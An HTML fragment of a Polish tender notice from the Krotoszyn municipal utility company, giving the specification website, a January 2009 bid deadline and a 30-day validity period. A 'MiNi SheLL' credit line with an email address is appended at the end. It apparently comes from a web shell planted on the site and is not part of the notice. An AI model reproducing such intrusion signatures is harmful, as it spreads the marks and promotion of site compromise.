<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pgkim.krotoszyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Spółka z o.o. ul. Rawicka 41, 63-700 Krotoszyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2009 godzina 10:00, miejsce: PGKiM Sp. z o.o. ul. Rawicka 41, 63-700 Krotoszyn pokój nr 10 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com